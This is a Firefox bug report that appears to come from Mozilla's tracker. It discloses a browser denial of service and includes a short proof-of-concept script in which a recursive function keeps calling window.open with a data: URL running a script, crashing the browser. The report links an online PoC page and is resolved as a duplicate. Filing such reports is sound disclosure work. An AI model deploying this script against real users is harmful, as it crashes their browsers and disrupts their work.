Denial of Service using a link via.window.open()

RESOLVED DUPLICATE of bug 685828

Status

()

defect
RESOLVED DUPLICATE of bug 685828
2 years ago
2 years ago

People

(Reporter: evilzyzeng, Unassigned)

Tracking

51 Branch
x86_64
macOS
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

Reporter

Description

2 years ago
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Steps to reproduce:

1.the poc script is:

<script>
function g(){
    window.open("https://cn.bing.com","z");
    window.open("data:text/html,<script>alert(document.domain)<\/script>","z");
    g();
    };

</script>
<a href="javascript:g()" style="font-size: 100px">click me</a>

or visit online poc page:

https://api.lightrains.org/poc/5.html

2.macOS version:10.12.3 firefox version:51.0.1



Actual results:

firefox doesn't work anymore,cpu occupancy rate rise rapidly,then firefox will crashed.


Expected results:

As normal as ever
Reporter

Updated

2 years ago
OS: Unspecified → Mac OS X
Hardware: Unspecified → x86_64

Updated

2 years ago
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 685828
Reporter

Comment 2

2 years ago
(In reply to :Gijs from comment #1)
> 
> *** This bug has been marked as a duplicate of bug 685828 ***

OK,Thank you for your work.
You need to log in before you can comment on or make changes to this bug.